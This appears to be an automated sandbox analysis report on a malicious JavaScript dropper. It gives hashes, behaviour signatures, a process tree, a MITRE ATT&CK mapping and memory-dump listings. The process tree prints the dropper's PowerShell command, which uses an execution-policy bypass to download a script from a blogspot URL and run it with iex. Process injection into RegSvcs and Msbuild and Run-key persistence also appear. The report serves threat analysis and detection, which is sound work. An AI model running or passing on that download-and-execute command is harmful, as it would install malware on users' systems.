Analysis

  • max time kernel
    134s
  • max time network
    115s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-05-2024 17:42

General

  • Target

    b9b4fb770fdb055d474f1a54886bdc380c22afa777a3a0aeaf42a04dcb6a56a8.js

  • Size

    1.8MB

  • MD5

    fffee7bcbf8f724b68d02ebe0c5a133b

  • SHA1

    739696c36214a1a37f382b4da835ba44d2665027

  • SHA256

    b9b4fb770fdb055d474f1a54886bdc380c22afa777a3a0aeaf42a04dcb6a56a8

  • SHA512

    3f2bd2aa6b5cb22aa0c2042fa3af032c83b55f7e5407344cdb502abaf33b3e42d2e0073540226e6a8f3e09f3495ddbc339bfa29a38e420f11583632aa55fe8f4

  • SSDEEP

    768:cNWDuYelMVBbnPOgADSb8O/b64/jWsYOS+Hu8N0RNta7SuHiHwdcU6AH6xgO:JewBbnPOgnh/6OSAuNA6H9AH83

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Obfuscated with Agile.Net obfuscator 1 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 6 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\b9b4fb770fdb055d474f1a54886bdc380c22afa777a3a0aeaf42a04dcb6a56a8.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4044
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm mainhotel5may.blogspot.com//////////////////////hehehehe) | . iex;Start-Sleep -Seconds 3;
      2⤵
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2664
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2716
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:224
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4800
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 772
          4⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:2536
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4440
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 784
          4⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:3496
      • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4672
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 648
          4⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:1304
      • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4424
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 780
          4⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:4644

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

JavaScript

1
T1059.007

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

3
T1012

System Information Discovery

4
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\Microsoft\Windows\WER\Temp\WER6C19.tmp.xml
    Filesize

    4KB

    MD5

    03935afc7b18018340c90c6becf7000c

    SHA1

    e65dad79ee37becf36d820f209cdfe022233c687

    SHA256

    dfd331453c2c3a9c2e3f049b2ab9732af32b402182ea2cccc085164811089cc5

    SHA512

    6a4201a7ef5a8b851b1a3350a7ed7b0f894fd932cdfa1a67ffb6fc7b07b8007d9003e78548bee9f548dbc00a97deb307a7e6b482a8897a768de649499224a46a

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lf3b3ocb.yvz.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/224-28-0x0000000000D10000-0x0000000000D96000-memory.dmp
    Filesize

    536KB

  • memory/224-30-0x0000000002DE0000-0x0000000002E46000-memory.dmp
    Filesize

    408KB

  • memory/2664-14-0x00007FFCC1640000-0x00007FFCC2101000-memory.dmp
    Filesize

    10.8MB

  • memory/2664-29-0x00007FFCC1640000-0x00007FFCC2101000-memory.dmp
    Filesize

    10.8MB

  • memory/2664-0-0x00007FFCC1643000-0x00007FFCC1645000-memory.dmp
    Filesize

    8KB

  • memory/2664-16-0x000001FFBA520000-0x000001FFBA52E000-memory.dmp
    Filesize

    56KB

  • memory/2664-17-0x000001FFBA550000-0x000001FFBA56A000-memory.dmp
    Filesize

    104KB

  • memory/2664-18-0x000001FFBA540000-0x000001FFBA54A000-memory.dmp
    Filesize

    40KB

  • memory/2664-19-0x000001FFBA570000-0x000001FFBA578000-memory.dmp
    Filesize

    32KB

  • memory/2664-20-0x000001FFBA580000-0x000001FFBA588000-memory.dmp
    Filesize

    32KB

  • memory/2664-21-0x000001FFD2CC0000-0x000001FFD2CC8000-memory.dmp
    Filesize

    32KB

  • memory/2664-65-0x00007FFCC1640000-0x00007FFCC2101000-memory.dmp
    Filesize

    10.8MB

  • memory/2664-12-0x00007FFCC1640000-0x00007FFCC2101000-memory.dmp
    Filesize

    10.8MB

  • memory/2664-13-0x000001FFD30B0000-0x000001FFD3272000-memory.dmp
    Filesize

    1.8MB

  • memory/2664-11-0x00007FFCC1640000-0x00007FFCC2101000-memory.dmp
    Filesize

    10.8MB

  • memory/2664-64-0x00007FFCC1640000-0x00007FFCC2101000-memory.dmp
    Filesize

    10.8MB

  • memory/2664-10-0x000001FFD27D0000-0x000001FFD27F2000-memory.dmp
    Filesize

    136KB

  • memory/2664-63-0x00007FFCC1643000-0x00007FFCC1645000-memory.dmp
    Filesize

    8KB

  • memory/2716-59-0x0000000005F70000-0x0000000006132000-memory.dmp
    Filesize

    1.8MB

  • memory/2716-60-0x0000000006720000-0x00000000067BC000-memory.dmp
    Filesize

    624KB

  • memory/2716-61-0x0000000006820000-0x0000000006870000-memory.dmp
    Filesize

    320KB

  • memory/2716-62-0x0000000006970000-0x000000000697A000-memory.dmp
    Filesize

    40KB

  • memory/2716-31-0x00000000056A0000-0x0000000005C44000-memory.dmp
    Filesize

    5.6MB

  • memory/2716-36-0x00000000050F0000-0x0000000005182000-memory.dmp
    Filesize

    584KB

  • memory/2716-22-0x0000000000400000-0x0000000000486000-memory.dmp
    Filesize

    536KB